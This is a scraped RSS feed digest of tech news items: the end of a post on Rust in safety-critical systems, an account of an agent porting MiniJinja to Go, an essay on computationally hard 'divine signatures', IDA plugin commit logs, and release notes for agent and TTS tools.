Treat interop as part of the safety story. Many teams are not going to rewrite their world in Rust. They are going to integrate Rust into existing C and C++ systems and carry that boundary for years. Guidance and tooling to keep interfaces correct, auditable, and in sync would help. The compiler team and lang team could consider how FFI boundaries are surfaced and checked, informed by requirements gathered through the Safety-Critical Rust Consortium.
"We rely very heavily on FFI compatibility between C, C++, and Rust. In a safety-critical space, that's where the difficulty ends up being, generating bindings, finding out what the problem was." -- Embedded systems engineer (mobile robotics)
Conclusion
To sum up the main points in this post:
- Rust is already deployed in production for safety-critical systems, including mobile robotics (IEC 61508 SIL 2) and medical devices (IEC 62304 Class B). The path exists.
- Rust's defaults (memory safety, thread safety, strong typing) map directly to much of what Functional Safety Engineers spend their time preventing. But ecosystem support thins out as you move toward higher-criticality software.
- At low criticality (QM), teams use crates freely and harden later. At higher levels (ASIL B+), third-party dependencies become difficult to justify, and teams rewrite, internalize, or build abstraction layers for future replacement.
- The compiler is doing work that used to require external tools and manual review. Much of what was historically process-based enforcement through standards like MISRA C and CERT C becomes a language-level concern, checked by the compiler. That can scale better than "review harder" for long-lived products with large teams and supports engineers in these domains feeling more secure in the systems they ship.
- Stability is operational: teams need to explain what upgrades change, manage dependency drift, and map target tier policies to their platform reality.
- Async is appealing for middleware and event-driven systems, but the runtime and qualification story is not settled for higher-criticality use.
We make six recommendations: find ways to help the safety-critical community support their own needs, establish ecosystem-wide MSRV conventions, create target-focused readiness checklists, document dependency lifecycle patterns, define requirements for safety-case friendly async runtimes, and treat C/C++ interop as part of the safety story.
Get involved
If you're working in safety-critical Rust, or you want to help make it easier, check out the Rust Foundation's Safety-Critical Rust Consortium and the in-progress Safety-Critical Rust coding guidelines.
Hearing concrete constraints, examples of assessor feedback, and what "evidence" actually looks like in practice is incredibly helpful. The goal is to make Rust's strengths more accessible in environments where correctness and safety are not optional.
-
If you're curious about how rigor scales with cost in ISO 26262, this Feabhas guide gives a good high-level overview. ↩
-
See the QNX target documentation for current status. ↩
-
The FLS team was created under the Rust Project in 2025. The team is now actively maintaining the specification, reviewing changes and keeping the FLS in sync with language evolution. ↩
-
See the MC/DC tracking issue for context. The initial implementation was removed due to maintenance concerns. ↩
-
Eclipse SDV's Eclipse S-CORE project includes an Orchestrator written in Rust for their async runtime, aimed at safety-critical automotive software. ↩
-
🔗 Ampcode News Painter rss
Amp can now generate and edit images, which is useful for design inspiration, tweaking mockups, and making visual assets:
Exploring UI alternatives: "show me 3 different designs for this task dashboard"
Editing an existing image: "update this dashboard with the changes shown in the attached image"
To use it, ask Amp to use the
paintertool explicitly. The painter uses Gemini 3 Pro Image (a.k.a. Nano Banana Pro) under the hood. -
🔗 Armin Ronacher Porting MiniJinja to Go With an Agent rss
Turns out you can just port things now. I already attempted this experiment in the summer, but it turned out to be a bit too much for what I had time for. However, things have advanced since. Yesterday I ported MiniJinja (a Rust Jinja2 template engine) to native Go, and I used an agent to do pretty much all of the work. In fact, I barely did anything beyond giving some high-level guidance on how I thought it could be accomplished.
In total I probably spent around 45 minutes actively with it. It worked for around 3 hours while I was watching, then another 7 hours alone. This post is a recollection of what happened and what I learned from it.
All prompting was done by voice using pi, starting with Opus 4.5 and switching to GPT-5.2 Codex for the long tail of test fixing.
What is MiniJinja
MiniJinja is a re-implementation of Jinja2 for Rust. I originally wrote it because I wanted to do a infrastructure automation project in Rust and Jinja was popular for that. The original project didn't go anywhere, but MiniJinja itself continued being useful for both me and other users.
The way MiniJinja is tested is with snapshot tests: inputs and expected outputs, using insta to verify they match. These snapshot tests were what I wanted to use to validate the Go port.
Test-Driven Porting
My initial prompt asked the agent to figure out how to validate the port. Through that conversation, the agent and I aligned on a path: reuse the existing Rust snapshot tests and port incrementally (lexer -> parser -> runtime).
This meant the agent built Go-side tooling to:
- Parse Rust's test input files (which embed settings as JSON headers).
- Parse the reference insta
.snapsnapshots and compare output. - Maintain a skip-list to temporarily opt out of failing tests.
This resulted in a pretty good harness with a tight feedback loop. The agent had a clear goal (make everything pass) and a progression (lexer -> parser -> runtime). The tight feedback loop mattered particularly at the end where it was about getting details right. Every missing behavior had one or more failing snapshots.
Branching in Pi
I used Pi's branching feature to structure the session into phases. I rewound back to earlier parts of the session and used the branch switch feature to inform the agent automatically what it had already done. This is similar to compaction, but Pi shows me what it puts into the context. When Pi switches branches it does two things:
- It stays in the same session so I can navigate around, but it makes a new branch off an earlier message.
- When switching, it adds a summary of what it did as a priming message into where it branched off. I found this quite helpful to avoid the agent doing vision quests from scratch to figure out how far it had already gotten.
Without switching branches, I would probably just make new sessions and have more plan files lying around or use something like Amp's handoff feature which also allows the agent to consult earlier conversations if it needs more information.
First Signs of Divergence
What was interesting is that the agent went from literal porting to behavioral porting quite quickly. I didn't steer it away from this as long as the behavior aligned. I let it do this for a few reasons. First, the code base isn't that large, so I felt I could make adjustments at the end if needed. Letting the agent continue with what was already working felt like the right strategy. Second, it was aligning to idiomatic Go much better this way.
For instance, on the runtime it implemented a tree-walking interpreter (not a bytecode interpreter like Rust) and it decided to use Go's reflection for the value type. I didn't tell it to do either of these things, but they made more sense than replicating my Rust interpreter design, which was partly motivated by not having a garbage collector or runtime type information.
Where I Had to Push Back
On the other hand, the agent made some changes while making tests pass that I disagreed with. It completely gave up on all the "must fail" tests because the error messages were impossible to replicate perfectly given the runtime differences. So I had to steer it towards fuzzy matching instead.
It also wanted to regress behavior I wanted to retain (e.g., exact HTML escaping semantics, or that
rangemust return an iterator). I think if I hadn't steered it there, it might not have made it to completion without going down problematic paths, or I would have lost confidence in the result.Grinding to Full Coverage
Once the major semantic mismatches were fixed, the remaining work was filling in all missing pieces: missing filters and test functions, loop extras, macros, call blocks, etc. Since I wanted to go to bed, I switched to Codex 5.2 and queued up a few "continue making all tests pass if they are not passing yet" prompts, then let it work through compaction. I felt confident enough that the agent could make the rest of the tests pass without guidance once it had the basics covered.
This phase ran without supervision overnight.
Final Cleanup
After functional convergence, I asked the agent to document internal functions and reorganize (like moving filters to a separate file). I also asked it to document all functions and filters like in the Rust code base. This was also when I set up CI, release processes, and talked through what was created to come up with some finalizing touches before merging.
Parting Thoughts
There are a few things I find interesting here.
First: these types of ports are possible now. I know porting was already possible for many months, but it required much more attention. This changes some dynamics. I feel less like technology choices are constrained by ecosystem lock-in. Sure, porting NumPy to Go would be a more involved undertaking, and getting it competitive even more so (years of optimizations in there). But still, it feels like many more libraries can be used now.
Second: for me, the value is shifting from the code to the tests and documentation. A good test suite might actually be worth more than the code. That said, this isn't an argument for keeping tests secret -- generating tests with good coverage is also getting easier. However, for keeping code bases in different languages in sync, you need to agree on shared tests, otherwise divergence is inevitable.
Lastly, there's the social dynamic. Once, having people port your code to other languages was something to take pride in. It was a sign of accomplishment -- a project was "cool enough" that someone put time into making it available elsewhere. With agents, it doesn't invoke the same feelings. Will McGugan also called out this change.
Session Stats
Lastly, some boring stats for the main session:
- Agent run duration: ~~10 hours (~~ 3 hours supervised)
- Active human time: ~45 minutes
- Total messages: 2,698
- My prompts: 34
- Tool calls: 1,386
- Raw API token cost: $60
- Total tokens: 2.2 million
- Models:
claude-opus-4-5andgpt-5.2-codexfor the unattended overnight run
This did not count the adding of doc strings and smaller fixups.
-
🔗 Stephen Diehl Hypothetical Divine Signatures rss
Hypothetical Divine Signatures
The author of the Epistle to the Hebrews famously claimed that "faith is the substance of things hoped for, the evidence of things not seen," which was a perfectly serviceable theological patch for an era where the average person’s greatest computational challenge was counting their own fingers. However, in an age where we can simulate galaxies and sequence genomes, "I’m God, trust me bro" is not a particularly compelling argument to the modern mind, unlike our goat-herding ancestors who were easily impressed by a well-timed solar eclipse or a particularly loud bush. If a truly omniscient entity wanted to establish a "scientific secular covenant" with a technological species, it would not rely on subjective feelings or ambiguous dreams. It would instead provide a Divine Signature through the cold, hard lens of computational complexity: a set of claims that are succinct enough to be carved into a stone tablet but so mathematically dense that finding them would require more energy than exists in the observable universe.
To move beyond mere storytelling and into the realm of objective proof, a text must demonstrate that it has bypassed Bremermann's Limit, the physical threshold for the maximum computational speed of any self-contained system in the material universe. This limit, derived from Einstein's mass-energy equivalence and the Heisenberg uncertainty principle, is approximately \( c^2/h \approx 1.36 \times 10^{50} \) bits per second per kilogram. The "soft" version of this limit considers a computer the mass of the Earth running for billions of years; the "strong" version considers harnessing every atom and cubic meter of space in the observable universe until heat death. By providing answers to problems that exceed even the strong limit, a "divine" author proves they are operating from a platform that exists outside our localized entropy and processing constraints, effectively signing their work with a flourish that no amount of ingenuity or effort could forge.
Personally, I hold no supernatural beliefs, and I am serenely indifferent to those who do. But a good hypothesis must be falsifiable, and intellectual honesty requires stating what evidence would change my mind. A verified divine signature of this kind would do exactly that. I would naturally default to material explanations until they were exhausted, but the exercise demonstrates that materialism is not unfalsifiable dogma; one can articulate the precise circumstances under which it would fall.
The Divine Factorization. A prophetic verse might read: "Behold the great number \( N \), whose length is as twenty thousand digits; it is born of the union of \( P \) and \( Q \), and none other shall divide it." This obviously refers to the Integer Factorization Problem. Twenty thousand digits is not even that much text; it is considerably shorter than the "begots" documenting forty generations of Levantine shepherds. While multiplying two primes to get a 20,000-digit semiprime is a simple operation, reversing the process is effectively intractable. For example, RSA-129 was published in 1977 with a one hundred million dollar prize and remained unfactored for 17 years:
$$114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541$$
$$= 3490529510847650949147849619903898133417764638493387843990820577$$
$$\times \ 32769132993266709549961988190834461413177642967992942539798288533$$
At only 129 digits, this took a massive distributed computing effort in 1994. A 20,000-digit semiprime is in another universe entirely. Under the General Number Field Sieve, the clock cycles required to factor a 20,000-digit number would exceed the total available energy in the observable universe. It is a thermodynamic wall that cannot be breached by any bounded intelligence without infinite time. For us, verification is trivial; we simply multiply the two provided numbers together to see if they match \( N \), a task a standard smartphone can complete in a fraction of a second.The Ramsey Revelation. The scripture would proclaim: "If ten brethren and ten strangers be gathered in a hall of souls, there shall surely be a clique of ten or a desert of ten; behold the map of their connections." This addresses the Constructive Lower Bound of Ramsey Numbers, denoted as \( R(r, s) \). The known diagonal Ramsey numbers are:
$$R(3,3) = 6, \quad R(4,4) = 18, \quad R(5,5) = 43\text{--}48, \quad R(6,6) = 102\text{--}165, \quad \ldots$$
We cannot even pin down \( R(5, 5) \) to an exact value; it is famously "impossible" to compute because the combinations grow too fast. Providing the exact value for \( R(10, 10) \) along with a specific graph coloring that avoids a clique of size 10 is succinct to state but requires navigating a search space that is thermodynamically inaccessible to our universe. To put this in perspective: the number of ways to two-color the edges of a graph with 1,000 nodes is \( 2^{499,500} \), while the number of atoms in the observable universe is roughly \( 2^{266} \). The search space is mathematically larger than any physical computer could ever process. We verify one graph; the author had to search all of them. Finding a specific "needle" graph in this haystack is a rational proof of super-universal processing power. Verification is straightforward for us because we can simply run a script to scan the provided adjacency matrix to confirm no group of 10 nodes exists where every edge is the same color, which is a polynomial time operation \( O(n^{10}) \) that is easily handled by modern hardware.The Circle’s Secret Checksum. The text would command: "Search the circle's measure at the position of \( 10^{80} \) and there find a thousand zeros followed by the message of the stars." This utilizes the Bailey–Borwein–Plouffe (BBP) algorithm, which allows us to calculate the \( n^{th} \) digit of \( \pi \) in base-16 without calculating the preceding digits:
$$\pi = \sum_{k=0}^{\infty} \frac{1}{16^k} \left( \frac{4}{8k+1} - \frac{2}{8k+4} - \frac{1}{8k+5} - \frac{1}{8k+6} \right)$$
We cannot currently scan \( \pi \) out to \( 10^{80} \) to find interesting patterns, and the information entropy of \( \pi \) suggests that such a massive, low-entropy anomaly at a coordinate equal to the number of atoms in the universe is statistically impossible to occur by chance. If the text successfully predicts a thousand zeros at a specific, distant coordinate, it implies the author did not "scan" for it but rather created the fundamental constants of mathematics itself, or possesses infinite foreknowledge of the structure of irrational numbers. This was, incidentally, a plot point in Carl Sagan's novel Contact, where a message hidden deep in the digits of \( \pi \) serves as a signature from the architects of the universe. While calculating the digit at \( 10^{80} \) is a massive task, it is technically feasible for a global distributed network. We verify this by running the BBP algorithm to check that specific "address," confirming the anomaly without needing to solve the entire constant.The End of Euler’s Dream. The prophet would say: "Though twelve powers of twelve seem to need their kind, search for the eleven that equal the one; find them at these integers." This targets the Smallest Counter-example to Euler’s Sum of Powers Conjecture, which posits that you need \( n \) \( n^{th} \) powers to sum to another \( n^{th} \) power:
$$\sum_{i=1}^{k} a_i^n = b^n \implies k \geq n$$
While humans found counter-examples for \( n=4 \) and \( n=5 \) after centuries of searching, providing a solution for \( n=12 \) would be a needle-in-a-haystack problem of cosmic proportions. This is essentially a search through a Diophantine space that is effectively infinite. We verify the claim easily by plugging the provided integers into a high-precision calculator and confirming the left side of the equation perfectly equals the right, transforming a massive search problem into a simple arithmetic check.The Busy Beaver's Rest. A prophetic verse might say: "Consider the machine of twenty states, simple in its ways; it shall toil for exactly \( X \) steps and then find its rest, and no man shall count the days of its labor." This is the Busy Beaver Function, \( BB(n) \), the final boss of computer science. Because it effectively solves the Halting Problem, no general algorithm exists to calculate these values; they are mathematically uncomputable. Humanity has, with heroic effort, managed to prove values only for the smallest machines:
$$BB(1) = 1, \quad BB(2) = 6, \quad BB(3) = 21, \quad BB(4) = 107, \quad BB(5) = 47176870, \quad \ldots$$
Beyond five states, the function explodes beyond comprehension; \( BB(6) \) is known to exceed \( 10 \uparrow\uparrow 15 \), a tower of 15 tens. Stating the exact halting time for a 20-state Turing machine is a God-level flex because it implies the author bypassed the logical impossibility of the Halting Problem itself. Verification is as simple as simulating the specific machine described and counting its steps until it halts, which requires zero creative mathematics or algorithmic breakthroughs on our part.The Kissing of Spheres. The scripture would read: "In a realm of an hundred depths, where spheres are gathered like grapes, exactly \( X \) shall press against the heart of the center." This refers to the Kissing Number problem: how many non-overlapping spheres can touch a central sphere of the same size? In three dimensions, the answer is 12, which is easy enough to visualize over a drink. In 8 dimensions, the answer is 240. In 24 dimensions, it is 196,560, thanks to the elegant structure of the Leech Lattice. But beyond 24 dimensions, we lack these lattice optimizations that make the math manageable. In 100 dimensions, the symmetry is so complex that our best supercomputers can only give us a vague range. The number of possible configurations for non-overlapping spheres explodes into a combinatorial nightmare, and determining the exact maximum requires navigating a high-dimensional search space so vast that even an advanced intelligence utilizing quantum annealing would likely settle on a local maximum rather than the true global optimum. Providing the exact integer would reveal a perfect mastery of high-dimensional space, the kind of insight that suggests the author is comfortable navigating 100-dimensional manifolds like they were a simple game of marbles. We verify the result by checking the provided coordinates of the spheres to ensure the distance between any two sphere centers satisfies:
$$\text{dist}(c_i, c_j) \geq 2$$
while each satisfies \( \text{dist}(c_i, \text{origin}) = 2 \), which is basic linear algebra.The Titan of Primes. The text might state: "The millionth prime of the form \( 2^p - 1 \) shall be found when \( p \) is this specific titan of a number." This identifies a "deep" Mersenne Prime, \( M_p = 2^p - 1 \). While we have only found about 50 of these primes using global distributed computing networks like GIMPS:
$$p_5 = 13, \quad p_{10} = 89, \quad p_{20} = 4423, \quad p_{30} = 132049, \quad p_{40} = 20996011, \quad p_{51} = 82589933, \quad \ldots$$
providing a "Distant" Mersenne Prime Exponent for the millionth one would be providing a password to the secret architecture of the number line. Finding it requires a "God’s-eye view" of prime distribution that likely requires a proof of the Riemann Hypothesis. Verification is quite efficient for us; we simply run the Lucas-Lehmer test on the provided exponent, which is a deterministic and well-understood primality test.The Skewes' Crossing. The text would proclaim: "Though the shadows of the primes seem ever fewer than the curve of the law, they shall rise up and exceed it at the count of this massive power tower." In analytic number theory, we know the actual count of primes \( \pi(x) \) eventually exceeds the logarithmic integral estimate \( li(x) \) (defined as \( \int_{2}^{x} \frac{dt}{\ln t} \), the "expected" number of primes up to \( x \)), but this Skewes' Number crossing occurs at such a staggering distance on the number line (originally estimated at \( 10^{10^{10^{34}}} \)) that it is effectively invisible to direct observation. This number is so deep into the number line that the observable universe is not large enough to write down its digits in standard form; you must use power towers. An entity pointing to a specific exception to a universal rule at such a distance is demonstrating a "God's eye view" of the entire number line simultaneously. To identify the exact integer of the first crossing requires a perfect knowledge of the distribution of the zeros of the Riemann Zeta function. We can verify the claim by evaluating \( \pi(x) \) using the Meissel-Lehmer algorithm and confirming that at the provided crossing point:
$$\pi(x) > li(x) \quad \text{for the first time}$$The Diophantine Key. The text would say: "Three cubes shall be gathered, and their sum shall be forty-two; seek them among the numbers of seventeen digits, and there find the truth." While humans found the solution for sums of three cubes for \( k=42 \) in 2019 using a planetary-scale computer network:
$$42 = (-80538738812075974)^3 + 80435758145817515^3 + 12602123297335631^3$$
providing a solution for a much more complex equation moves the problem into the realm of Hilbert's Tenth Problem. Because this problem is generally undecidable, there is no "method" to solve it; you cannot write a program to solve all Diophantine equations. Finding a solution to a sufficiently complex one implies the ability to look through the infinite set of integers and "pick out" the needle. A divine solution transcends mere calculation; it is an insight into an undecidable space, suggesting the author is unbound by the Halting Problem. Verification is the definition of trivial; we cube the three provided integers, add them together, and see if the sum equals the target constant.Of course, no existing religious text actually does this. They mostly focus on the really important issues of existence like who you can bang or what type of cheese you can put on meat. Which were very human concerns that do not require much more than a Bronze Age imagination. One would think that a divine entity with infinite knowledge and infinite (computational) power would want to leave a signature that actually scales with the intelligence of the species it created. Providing a succinct, verifiable, but computationally impossible result would be the only way to satisfy a scientific secular framework. The fact that we have found plenty of rules about shellfish but zero 20,000-digit prime factors suggests that if there is a Great Programmer in the sky, they are either very shy or they simply forgot to
git add README.mdin the final build.
-
- January 13, 2026
-
🔗 IDA Plugin Updates IDA Plugin Updates on 2026-01-13 rss
IDA Plugin Updates on 2026-01-13
New Releases:
- ida-chat-plugin v0.2.4
- ida-chat-plugin v0.2.3
- ida-chat-plugin v0.2.2
- ida-chat-plugin v0.2.1
- ida-chat-plugin v0.2.0 - Panel docking improvements
- ida-domain v0.3.6-dev.3
- ida-hcli v0.15.8
- ida-hcli v0.15.7
- ida-hcli v0.15.6
- ida-hcli v0.15.5
Activity:
- capa
- 6ad4fbbb: Merge pull request #2742 from mandiant/idalib-tests
- 8105214d: build(deps-dev): bump build from 1.3.0 to 1.4.0 (#2809)
- d1fc8446: pyproject: ida: silence SWIG related warnings from IDA bindings
- 0686305f: ida: loader: load resource sections to help discovery of embedded files
- 8d6b878e: ida: fix return value from open_database
- 3646fcef: ida: helpers: refactor discovery of alternative names
- ce67d99e: ida: skip function-name features for default names (sub_*)
- c89871f2: ci: pin setup-uv
- 03cc901f: tests: idalib: xfail resource test on 9.0
- 412ab62c: ida: pep8
- f72bd49a: ci: enable testing of IDA 9.0
- 1d561bd0: tests: idalib: xfail two tests on 9.0 and 9.1
- c5808c4c: tests: idalib: use 9.1 instead of 9.0 as min ver
- 200c8037: tests: fix logging message
- 4fb6ac0d: add ida version to test matrix name
- 87fb96d0: load resource for test sample
- e1fd1848: ida: function: extract function name
- 82be20be: loader: idalib: disable lumina
- 132e64a9: tests: idalib: better detect missing idapro package
- 9c6db007: ci: add configuration for idalib tests
- cpp03
- decode_instruction
- ca99ff19: Fix email format in authors section of ida-plugin.json
- ghidra
- ba6cc4a4: Merge remote-tracking branch 'origin/patch'
- c38915eb: Merge remote-tracking branch 'origin/GP-6284_ryanmkurtz_wheels' into …
- 6208df2d: GP-1 Corrected RISCV import opinion file
- c73c09ce: Merge remote-tracking branch 'origin/GP-6299_Dan_fixHungUI-take2'
- 49c9a724: GP-6299: New approach ()
- 2c99fbe7: Revert "GP-6299: Bail from getPreviousLayout if there are no layouts."
- e3dc18ee: Merge remote-tracking branch 'origin/GP-6299_Dan_fixHungUI'
- b3424594: GP-6176: Forgot to make Objc2TypeMetadata getters
- 36bdaab8: Merge remote-tracking branch
- 425577a0: Merge remote-tracking branch
- bb725c1b: Merge remote-tracking branch 'origin/patch'
- 1789bb9c: GP-1 minor doc fix
- 75b1172a: Merge remote-tracking branch 'origin/GP-6298_Dan_fixSnapshotIsNull' i…
- 00f6e14c: Merge remote-tracking branch 'origin/GP-6316_SleighUnique256' into patch
- 5cac537c: Merge remote-tracking branch 'origin/GP-6314_CrossbuildLocalLabels' i…
- ida-chat-plugin
- 2442297c: Improve status bar and header UI
- 4492a4a8: Add rich markdown rendering to CLI
- 8b162e3a: added video
- e4a2a555: Update installation docs with GitHub URL and hcli version note
- ca56dc4f: 0.2.4
- 7a1aac84: Fix release workflow to allow updating existing releases
- f8dd360a: 0.2.3
- ee743756: 0.2.2
- 74194ad7: Revert to claude-code-transcripts dependency
- 9e24a136: Fix release workflow dependency conflict
- f2801da4: Disable PyPI publishing in release workflow
- a3e86d21: Improve release workflow and documentation
- 315e016d: Refactor transcript export and update dependency to claude-code-log
- 9db294f9: Add README with screenshots, untrack local config files
- d7289a56: Add share button to export chat as HTML
- 5ef089e3: Fix text wrapping in code/output bubbles
- 25040b7d: Revert "Make chat bubbles responsive with 80% max width"
- c3a0a86e: Make chat bubbles responsive with 80% max width
- 7d53cd5b: Fix MessageHistory API calls in core module
- c87223fc: Add transcript command for HTML generation
- ida-domain
- ida-hcli
- c0759c0e: 0.15.8
- 55b7e645: feat: add GitHub URL support for plugin install (#138)
- 12bf8daf: docs: add CHANGELOG.md covering releases since 0.14.1
- 43faa183: 0.15.7
- b8ab7dd1: fix: plugin: correct status message nesting during dependency install…
- 3c0b0f99: 0.15.6
- 89b63a66: feat: improve error message when IDA version detection fails
- 24624916: 0.15.5
- cb8b176c: plugin: settings: accept prompt=False to hide settings with a default
- IDAPluginList
- 404b8542: chore: Auto update IDA plugins (Updated: 19, Cloned: 0, Failed: 0)
- IDApy_FunctionStringAssociate
- 66123401: Added support for IDA 9 SDK with minor optimizations
- msc-thesis-LLMs-to-rank-decompilers
- febb8a8a: update for desktop
- patcherex
- 9457abf3: Update cfg_utils.detect_syscall_wrapper. (#65)
- quokka
- rhabdomancer
- sharingan
- 4a74be30: format module deadif
- symless
- ca1a96ef: Symless 1.1
-
🔗 badlogic/pi-mono v0.45.7 release
-
🔗 r/LocalLLaMA Soprano TTS training code released: Create your own 2000x realtime on-device text-to-speech model with Soprano-Factory! rss
| Hello everyone! I’ve been listening to all your feedback on Soprano, and I’ve been working nonstop over these past three weeks to incorporate everything, so I have a TON of updates for you all! For those of you who haven’t heard of Soprano before, it is an on-device text-to-speech model I designed to have highly natural intonation and quality with a small model footprint. It can run up to 20x realtime on CPU, and up to 2000x on GPU. It also supports lossless streaming with 15 ms latency , an order of magnitude lower than any other TTS model. You can check out Soprano here: Github: https://github.com/ekwek1/soprano Demo: https://huggingface.co/spaces/ekwek/Soprano-TTS Model: https://huggingface.co/ekwek/Soprano-80M Today, I am releasing training code for you guys! This was by far the most requested feature to be added, and I am happy to announce that you can now train your own ultra-lightweight, ultra-realistic TTS models like the one in the video with your own data on your own hardware with Soprano-Factory! Using Soprano-Factory, you can add new voices , styles , and languages to Soprano. The entire repository is just 600 lines of code, making it easily customizable to suit your needs. In addition to the training code, I am also releasing Soprano-Encoder , which converts raw audio into audio tokens for training. You can find both here: Soprano-Factory: https://github.com/ekwek1/soprano-factory Soprano-Encoder: https://huggingface.co/ekwek/Soprano-Encoder I hope you enjoy it! See you tomorrow, - Eugene Disclaimer: I did not originally design Soprano with finetuning in mind. As a result, I cannot guarantee that you will see good results after training. Personally, I have my doubts that an 80M-parameter model trained on just 1000 hours of data can generalize to OOD datasets, but I have seen bigger miracles on this sub happen, so knock yourself out :) submitted by /u/eugenekwek
[link] [comments]
---|--- -
🔗 badlogic/pi-mono v0.45.6 release
Added
ctx.ui.custom()now acceptsoverlayOptionsfor overlay positioning and sizing (anchor, margins, offsets, percentages, absolute positioning) (#667 by @nicobailon)ctx.ui.custom()now acceptsonHandlecallback to receive theOverlayHandlefor controlling overlay visibility (#667 by @nicobailon)- Extension example:
overlay-qa-tests.tswith 10 commands for testing overlay positioning, animation, and toggle scenarios (#667 by @nicobailon) - Extension example:
doom-overlay/- DOOM game running as an overlay at 35 FPS (auto-downloads WAD on first run) (#667 by @nicobailon)
-
🔗 badlogic/pi-mono v0.45.5 release
Fixed
- Skip changelog display on fresh install (only show on upgrades)
-
🔗 badlogic/pi-mono v0.45.4 release
Changed
- Light theme colors adjusted for WCAG AA compliance (4.5:1 contrast ratio against white backgrounds)
- Replaced
sharpwithwasm-vipsfor image processing (resize, PNG conversion). Eliminates native build requirements that caused installation failures on some systems. (#696)
Added
- Extension example:
summarize.tsfor summarizing conversations using custom UI and an external model (#684 by @scutifer) - Extension example:
question.tsenhanced with custom UI for asking user questions (#693 by @ferologics) - Extension example:
plan-mode/enhanced with explicit step tracking and progress widget (#694 by @ferologics) - Extension example:
questionnaire.tsfor multi-question input with tab bar navigation (#695 by @ferologics) - Experimental Vercel AI Gateway provider support: set
AI_GATEWAY_API_KEYand use--provider vercel-ai-gateway. Token usage is currently reported incorrectly by Anthropic Messages compatible endpoint. (#689 by @timolins)
Fixed
- Fix API key resolution after model switches by using provider argument (#691 by @joshp123)
- Fixed z.ai thinking/reasoning: thinking toggle now correctly enables/disables thinking for z.ai models (#688)
- Fixed extension loading in compiled Bun binary: extensions with local file imports now work correctly. Updated
@mariozechner/jitito v2.6.5 which bundles babel for Bun binary compatibility. (#681) - Fixed theme loading when installed via mise: use wrapper directory in release tarballs for compatibility with mise's
strip_components=1extraction. (#681)
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release rss
sync repo: +1 plugin, +1 release ## New plugins - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin) (1.0.0) -
🔗 HexRaysSA/plugin-repository commits ida-chat-plugin rss
ida-chat-plugin -
🔗 @cxiao@infosec.exchange regarding the "inevitability" of technology: mastodon
regarding the "inevitability" of technology:
-
🔗 @cxiao@infosec.exchange RE: [https://dair- mastodon
RE: https://dair- community.social/@emilymbender/115888462372987312
very good essay. it's not my job to test AI for you by shoving AI into my life and work no matter what.
and to turn the "wishful thinking" frame around too, it's actually AI boosters that are engaging in the wishful thinking: of a magical universal technology that can be deployed regardless of whether it's actually solving any problems
none of this technology is inevitable
-
🔗 HexRaysSA/plugin-repository commits sync repo: ~3 changed rss
sync repo: ~3 changed No plugin changes detected -
🔗 r/LocalLLaMA My wishes for 2026 rss
| Which do you think will happen first? And which won’t happen in 2026? submitted by /u/jacek2023
[link] [comments]
---|--- -
🔗 r/reverseengineering Floxif File Infector Analysis with Binary Ninja rss
submitted by /u/jershmagersh
[link] [comments] -
🔗 r/LocalLLaMA kyutai just introduced Pocket TTS: a 100M-parameter text-to-speech model with high-quality voice cloning that runs on your laptop—no GPU required rss
| Blog post with demo: Pocket TTS: A high quality TTS that gives your CPU a voice: https://kyutai.org/blog/2026-01-13-pocket-tts GitHub: https://github.com/kyutai-labs/pocket-tts Hugging Face Model Card: https://huggingface.co/kyutai/pocket-tts arXiv:2509.06926 [cs.SD]: Continuous Audio Language Models
Simon Rouard, Manu Orsini, Axel Roebel, Neil Zeghidour, Alexandre Défossez
https://arxiv.org/abs/2509.06926 From kyutai on 𝕏: https://x.com/kyutai_labs/status/2011047335892303875 submitted by /u/Nunki08
[link] [comments]
---|--- -
🔗 badlogic/pi-mono v0.45.3 release
No content.
-
🔗 badlogic/pi-mono v0.45.2 release
Fixed
- Extensions now load correctly in compiled Bun binary by using jiti for module resolution with proper alias handling
-
🔗 badlogic/pi-mono v0.45.1 release
Changed
/sharenow outputsbuildwithpi.aisession preview URLs instead ofshittycodingagent.ai
-
🔗 badlogic/pi-mono v0.45.0 release
Added
- MiniMax provider support: set
MINIMAX_API_KEYand useminimax/MiniMax-M2.1(#656 by @dannote) /scoped-models: Alt+Up/Down to reorder enabled models. Order is preserved when saving with Ctrl+S and determines Ctrl+P cycling order. (#676 by @thomasmhr)- Amazon Bedrock provider support (experimental, tested with Anthropic Claude models only) (#494 by @unexge)
- Extension example:
sandbox/for OS-level bash sandboxing using@anthropic-ai/sandbox-runtimewith per-project config (#673 by @dannote)
- MiniMax provider support: set
-
🔗 Ampcode News Handoff, Please rss
Up until now, you had to click a button or trigger a command to handoff when your thread became too long or you had finished a task.
Now you can just ask the agent:
- After implementing a feature: "Handoff and build an admin panel for this"
- After fixing a bug: "Handoff and check if this issue exists elsewhere"
- After planning: "Handoff to implement the plan"
The agent starts a new thread with the relevant context and keeps working.

-
🔗 Ampcode News Stick a Fork in It, It's Done rss
We're ripping out the Fork command.
We added thread forking back in July 2025 (now ancient, primordial history) as a way to conveniently share context for branching experiments or side quests in Amp.
Today we have better ways of sharing context between threads: handoff and thread mentions, which treat threads as first-class stores of context.
Perhaps there is a great potential UX out there for
fork, but we want Amp to be simple as well as powerful. We'd rather spend our time perfectinghandoffandthread mentionsthan supportfork.Handoff
Handoff is great for extracting useful context from your thread for the next goal at hand. This means you can start a new thread with only the necessary context.
- Use
thread: handofffrom the command palette. - Prompt your task and a new thread will be started with the necessary context already in the prompt.
Thread Mentions
Thread mentions let you pull information from other threads into your current thread. You can reference multiple threads, merging context from many sources.
- Use
thread:newand then use theentershortcut to start a new thread with a reference to the main thread. - Or, use
@@to search for the thread you want to pull context from. - Once you run your prompt, Amp will read the threads and extract context pertinent to your task.
Managing Threads
Using new threads as branches leads to many threads, often running in parallel. To manage them:
- use
thread: switch to previousorthread: switch to parentto return to the main thread. - use the
thread: mapto get a birds eye view and easily navigate back to the main thread (CLI only for now).
- Use
-







